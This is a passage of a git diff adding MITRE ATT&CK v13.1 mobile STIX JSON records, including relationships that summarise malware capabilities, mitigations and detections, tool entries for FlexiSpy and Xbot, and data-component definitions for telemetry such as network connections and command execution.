messages.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fdf06a0b-08d2-4cac-9d49-b3f1454ec4ea.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fdf06a0b-08d2-4cac-9d49-b3f1454ec4ea.json new file mode 100644 index 0000000000000000000000000000000000000000..db3f793326041ebc513c35773ea8f2322c1308c1 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fdf06a0b-08d2-4cac-9d49-b3f1454ec4ea.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--1daac5d2-3700-4242-919e-2b744baeed8b", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--fdf06a0b-08d2-4cac-9d49-b3f1454ec4ea", + "created": "2022-03-30T19:32:43.015Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Attestation can detect rooted devices. Mobile security software can then use this information and take appropriate mitigation action. Attestation can detect rooted devices.", + "modified": "2022-03-30T19:32:43.015Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fe794ba6-42be-4d42-a16f-a41473874331.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fe794ba6-42be-4d42-a16f-a41473874331.json new file mode 100644 index 0000000000000000000000000000000000000000..8a999e98a5e76c55ecbcccf999e7e9ec48fde0dc --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fe794ba6-42be-4d42-a16f-a41473874331.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--ea7ab4c0-ff62-490d-9cba-8a7143b50946", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--fe794ba6-42be-4d42-a16f-a41473874331", + "created": "2022-03-30T15:08:13.679Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Android-VerifiedBoot", + "url": "https://source.android.com/security/verifiedboot/", + "description": "Android. (n.d.). Verified Boot. Retrieved December 21, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android Verified Boot can detect unauthorized modifications made to the system partition, which could lead to execution flow hijacking.(Citation: Android-VerifiedBoot) ", + "modified": "2022-03-30T15:08:13.679Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321", + "target_ref": "attack-pattern--c6e17ca2-08b5-4379-9786-89bd05241831", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ff3aa49b-c054-44ec-89da-6c67d4995193.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ff3aa49b-c054-44ec-89da-6c67d4995193.json new file mode 100644 index 0000000000000000000000000000000000000000..6abfb5fb5410f5ea0900655f57314ac602d7ed76 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ff3aa49b-c054-44ec-89da-6c67d4995193.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--d2aea618-a9e3-4c86-9613-8ce2762050e6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ff3aa49b-c054-44ec-89da-6c67d4995193", + "created": "2023-03-20T18:44:44.257Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:44:44.257Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--a8c31121-852b-46bd-9ba4-674ae5afe7ad", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ffc24804-42db-4be1-a418-7f5ab9de453c.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ffc24804-42db-4be1-a418-7f5ab9de453c.json new file mode 100644 index 0000000000000000000000000000000000000000..d1bbc4e50f95189aed7856fc98cbcd0dc3abf41b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ffc24804-42db-4be1-a418-7f5ab9de453c.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--e80f9bcb-1e25-472c-a73d-158a51f95f76", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffc24804-42db-4be1-a418-7f5ab9de453c", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-NotCompatible", + "description": "Tim Strazzere. (2014, November 19). The new NotCompatible: Sophisticated and evasive threat harbors the potential to compromise enterprise networks. Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/11/19/notcompatible/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[NotCompatible](https://attack.mitre.org/software/S0299) has the capability to exploit systems on an enterprise network.(Citation: Lookout-NotCompatible)", + "relationship_type": "uses", + "source_ref": "malware--23040c15-e7d8-47b5-8c16-8fd3e0e297fe", + "target_ref": "attack-pattern--22379609-a99f-4a01-bd7e-70f3e105859d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ffc82546-f4da-4f47-88ec-b215edb1d695.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ffc82546-f4da-4f47-88ec-b215edb1d695.json new file mode 100644 index 0000000000000000000000000000000000000000..7321c385937733becaee349c1c4bdd31f78b2a3c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ffc82546-f4da-4f47-88ec-b215edb1d695.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--0f30608c-d7e5-4e13-89e6-8f37dff9cb2c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffc82546-f4da-4f47-88ec-b215edb1d695", + "type": "relationship", + "created": "2021-02-08T16:36:20.799Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021." + } + ], + "modified": "2021-05-24T13:16:56.589Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has included malware functionality capable of downloading new DEX files at runtime during Operation BULL.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ffddcabb-0f03-46ae-abd6-7ab94e91b055.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ffddcabb-0f03-46ae-abd6-7ab94e91b055.json new file mode 100644 index 0000000000000000000000000000000000000000..b6336579389096a0866b5bf28484ab919d1bc40d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ffddcabb-0f03-46ae-abd6-7ab94e91b055.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--50484108-4f2b-49a3-b566-e64ec1b2e7f5", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffddcabb-0f03-46ae-abd6-7ab94e91b055", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://www.wandera.com/reddrop-malware/", + "description": "Nell Campbell. (2018, February 27). RedDrop: the blackmailing mobile malware family lurking in app stores. Retrieved September 18, 2018.", + "source_name": "Wandera-RedDrop" + } + ], + "modified": "2019-09-10T13:14:39.009Z", + "description": "[RedDrop](https://attack.mitre.org/software/S0326) captures live recordings of the device's surroundings.(Citation: Wandera-RedDrop)", + "relationship_type": "uses", + "source_ref": "malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fff16b5e-49c2-45e2-8b3a-fd5f82c96dd9.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fff16b5e-49c2-45e2-8b3a-fd5f82c96dd9.json new file mode 100644 index 0000000000000000000000000000000000000000..dad94e02215f8bf72ace313907557b1863816d99 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fff16b5e-49c2-45e2-8b3a-fd5f82c96dd9.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--9ae69822-6199-4b2c-b28b-69c57f547116", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fff16b5e-49c2-45e2-8b3a-fd5f82c96dd9", + "created": "2020-04-08T15:51:25.149Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ThreatFabric Ginp", + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020.", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:30:28.587Z", + "description": "[Ginp](https://attack.mitre.org/software/S0423) can download the device\u2019s contact list.(Citation: ThreatFabric Ginp)", + "relationship_type": "uses", + "source_ref": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/tool/tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81.json b/cti-ATT-CK-v13.1/mobile-attack/tool/tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81.json new file mode 100644 index 0000000000000000000000000000000000000000..30be72062f983e326f1a72c1640b1cecd32e2e4d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/tool/tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81.json @@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--97131e09-4d17-4422-923c-6e5bdc54f062", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Emily Ratliff, IBM" + ], + "x_mitre_aliases": [ + "FlexiSpy" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "type": "tool", + "created": "2019-09-04T15:38:56.070Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0408", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0408" + }, + { + "description": "K. Lu. (n.d.). Deep Technical Analysis of the Spyware FlexiSpy for Android. Retrieved September 10, 2019.", + "url": "https://d3gpjj9d20n0p3.cloudfront.net/fortiguard/research/Dig%20Deep%20into%20FlexiSpy%20for%20Android%28white%20paper%29_KaiLu.pdf", + "source_name": "FortiGuard-FlexiSpy" + }, + { + "source_name": "CyberMerchants-FlexiSpy", + "url": "http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html", + "description": "Actis B. (2017, April 22). FlexSpy Application Analysis. Retrieved September 4, 2019." + }, + { + "source_name": "FlexiSpy-Website", + "url": "https://www.flexispy.com/", + "description": "FlexiSpy. (n.d.). FlexiSpy. Retrieved September 4, 2019." + } + ], + "modified": "2019-10-14T18:08:28.349Z", + "name": "FlexiSpy", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) is sophisticated surveillanceware for iOS and Android. Publicly-available, comprehensive analysis has only been found for the Android version.(Citation: FortiGuard-FlexiSpy)(Citation: CyberMerchants-FlexiSpy)\n\n[FlexiSpy](https://attack.mitre.org/software/S0408) markets itself as a parental control and employee monitoring application.(Citation: FlexiSpy-Website)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/tool/tool--da21929e-40c0-443d-bdf4-6b60d15448b4.json b/cti-ATT-CK-v13.1/mobile-attack/tool/tool--da21929e-40c0-443d-bdf4-6b60d15448b4.json new file mode 100644 index 0000000000000000000000000000000000000000..dbd5c5565d4b5b11a7208ea3cb3f32b6a3ea109d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/tool/tool--da21929e-40c0-443d-bdf4-6b60d15448b4.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--f71c2f58-d4a1-4e14-b9fa-e0d45bc2b7a7", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Xbot", + "description": "[Xbot](https://attack.mitre.org/software/S0298) is an Android malware family that was observed in 2016 primarily targeting Android users in Russia and Australia. (Citation: PaloAlto-Xbot)", + "labels": [ + "tool" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "tool", + "id": "tool--da21929e-40c0-443d-bdf4-6b60d15448b4", + "created": "2017-10-25T14:48:48.609Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0298", + "external_id": "S0298" + }, + { + "source_name": "Xbot", + "description": "(Citation: PaloAlto-Xbot)" + }, + { + "source_name": "PaloAlto-Xbot", + "description": "Cong Zheng, Claud Xiao and Zhi Xu. (2016, February 18). New Android Trojan \u201cXbot\u201d Phishes Credit Cards and Bank Accounts, Encrypts Devices for Ransom. Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba.json new file mode 100644 index 0000000000000000000000000000000000000000..7d81fe4d0b2b8c1bf78a17fe1b0cb51a10ec4f9f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba.json @@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--0278285a-6a54-465c-8d73-fad0bcb32805", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-20T20:18:06.745Z", + "name": "Network Connection Creation", + "description": "Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c.json new file mode 100644 index 0000000000000000000000000000000000000000..29c702b526278790975c57a8d7af62d0bbb1935d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--2dfe1862-e2e4-4755-a6b0-e97b3c1a3157", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Network Traffic Content", + "description": "Logged network traffic data showing both protocol header and body values (ex: PCAP)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077.json new file mode 100644 index 0000000000000000000000000000000000000000..22ab05d16e36f080c2fd7d498e9e9950cba52990 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077.json @@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--21875d58-4868-4d63-bd7d-fca721caf4f8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-07T16:15:56.932Z", + "name": "Process Creation", + "description": "The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.)", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6.json new file mode 100644 index 0000000000000000000000000000000000000000..d9c88f869a93d3f0f8b3762e4bb7afd867ed9427 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--5194ca2c-f959-45f1-8583-75c6a758e5ab", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-13T20:48:14.540Z", + "name": "System Settings", + "description": "Settings visible to the user on the device", + "x_mitre_data_source_ref": "x-mitre-data-source--55ba7d30-887f-42c1-a24e-c4e90aff24b8", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "created": "2023-03-13T20:48:14.540Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962.json new file mode 100644 index 0000000000000000000000000000000000000000..6fbbfac6e326117981c2f106ae4e5d4d356065e4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--72b54462-4fc8-46ae-b018-773e49d92436", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-13T19:59:14.491Z", + "name": "API Calls", + "description": "API calls utilized by an application that could indicate malicious activity", + "x_mitre_data_source_ref": "x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "created": "2023-03-13T19:59:14.491Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f.json new file mode 100644 index 0000000000000000000000000000000000000000..91461a318709e5d098cefa9236b4a82b7f8a376b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--80d3bbdb-522c-4eaf-a37b-5882eda4a6e3", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Process Termination", + "description": "Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689)", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0.json new file mode 100644 index 0000000000000000000000000000000000000000..7da1cdf13274379cc54ae1bc3bf2214318489ed7 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0.json @@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--79345f19-b05b-4014-844d-7c2e85fc52d5", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-07T16:14:39.124Z", + "name": "Command Execution", + "description": "The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. )", + "x_mitre_data_source_ref": "x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2.json new file mode 100644 index 0000000000000000000000000000000000000000..9f383dc393650c9df6d215fd8360a875755d1707 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--61cce305-4a82-496f-b88d-67941367e5c6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-13T20:00:38.029Z", + "name": "Protected Configuration", + "description": "Device configuration options that are not typically utilized by benign applications", + "x_mitre_data_source_ref": "x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2", + "created": "2023-03-13T20:00:38.029Z", + "revoked": false, + "object_marking_refs": [ + 